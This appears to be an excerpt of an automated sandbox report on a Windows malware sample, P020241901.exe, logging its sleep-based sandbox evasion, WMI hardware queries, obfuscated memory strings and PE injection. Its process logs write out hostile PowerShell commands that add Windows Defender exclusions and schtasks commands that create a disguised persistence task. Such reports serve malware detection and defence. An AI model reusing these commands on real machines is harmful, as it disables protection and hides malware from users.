                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -94312s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\P020241901.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\P020241901.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99888Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99774Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99661Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99297Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99186Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 99077Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98965Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98843Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98734Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98625Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98501Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98375Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98265Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98156Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 98047Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97937Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97828Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97718Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97609Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97500Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97390Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97281Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97171Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97062Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96953Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96843Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96734Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96625Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96515Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96406Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96169Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96061Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95953Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95838Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95718Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95609Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95495Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95375Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95265Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95153Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95031Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94921Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94812Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94703Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94593Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94484Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94375Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99891
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99381
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99250
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99141
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 99030
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98922
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98813
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98703
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98594
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98469
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98359
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98250
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98139
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 98031
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97922
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97812
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97702
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97594
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97469
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97324
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97219
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97109
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 97000
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96891
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96781
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96672
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96563
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96438
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96328
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96219
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 96094
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95984
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95875
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95766
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95656
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95547
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95438
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95313
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95203
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 95094
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94969
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94859
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94750
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94641
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94531
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94422
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 94312
                      Source: P020241901.exe, 00000000.00000002.2018716291.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, P020241901.exe, 00000000.00000002.2002617637.00000000038E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: go06C9moK82tIqZfYyXFyHnObvr3rETjTdJKrovpuWOrJRdZAY1NhbL6xr2KDkKl0X9RNbitViXC2bICkPN7xvjou9v8j7Vr46OJCQSUieKOLS7BVe6fJxxEsYdQMjUserControlSystem.Windows.FormsBsoJdVRmu5nnFQavYBUITypeEditorSystem.Drawing.DesignSystem.DrawingvZWtiWV13yU3vV9Kh5EnumV2nvDqc7RyF0ks5tTrJObTin3CXn6UMXNCsYzcoFxPGFG5DVnMwYGRLZOicG8haQp72CnjdtMulticastDelegateWH7aWt1NlDl4G9LLBFYYHtB798QniySMMM3jDkSAcHTR8C2aoXqeq2q751oqafFxvmHuowBuyvIvDuj2O5iArGaAZKKZtlkCWLjY5O1adiwSorcrF8N30gtjjgfmGtor1EDL2bYKO2jKJdiezsOj0QLGA0LU4RrWXoiDBn8aFBLTN9MUyKfMNhIACoJgfVWl8ZPi84JFSVG6w8tDxTTva1AXJDxZW4CBlmB1X6LC85HIoPtUAkW23ojW43PIBYdwKu7ZXXPrjHPgpkJr4plIk3p1lMaVhOaokelDeCr6UGmcdOJNjxaf2Hv8uSR1LPhVp97Xo3Hjt6Pv64bOLnHfyggiGViri5EAGY8Y8kxhMon41UfUXZQosr60DTwgEvRkgLjLLSsfE0cNje9TcX0xAKQDM7LNZDFXeZkIvxW4V3GyxGyWIbYb8sMhFtXyAAW6DLme7sX2nkHVGFMOkfDOBO4V0TYJE8HF53XACrpCXanipSlFsT8289XTMyob6RQUhhW6Vl5ku9s71gq1ZDn8bwgwkvCiyphBY1Bmn1A8FYmoH9uW1uhjX5Oiqh7yN2HxwtDEnihgHyZauUHyt3XGD6icUQC0Cnq4SE2xEventArgsve7tyRHs4WHXJfRZvpApplicationExceptioncadg7Rdhg8q8Fy4m9yqTFDAaqqKDin8RPIp2jUDTrMKoAfDNbGILbvqfrOihsrVIqemUYdKbiGTtMKSJFrUfVV0vaACL65FXeurTn9E8fCEaG3IEi4ompnZTtFNQRsvIhF1ut1HeAV7lN7QKtQZKKOEqWWpeP4VpafbPNNRdxo201VexQ9abRandomIy6OlWlTI2sYZDWQ9KDgvB8pzEaIlIvY5eQSExpandableObjectConverterSystem.ComponentModelVWxAWNb5I4Q1gTqGVMCkWnSbhbbCWtgjjeSpSOIue4QBbmdGk7MRxcCKKQXEfCQbO4ejMkoi2pkL<Module>{A5B7D210-A563-43EF-9C8F-E1ED8BE4CD90}QXB9VtbDufJ2i45vqGSkde3Y8bIspnpq32sr85xLIHnQbRku0p32M98TE<PrivateImplementationDetails>{331EA7A6-2D0B-4CE5-86FC-A51130E255B7}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
                      Source: P020241901.exe, 00000000.00000002.2018716291.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, P020241901.exe, 00000000.00000002.2002617637.00000000038E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qfrOihsrVIqemUYdKb
                      Source: VKkzqGUhsZwwm.exe, 0000000E.00000002.3242832019.0000000006130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                      Source: P020241901.exe, 00000009.00000002.3231496428.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\P020241901.exeMemory written: C:\Users\user\Desktop\P020241901.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory written: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmpJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Users\user\Desktop\P020241901.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
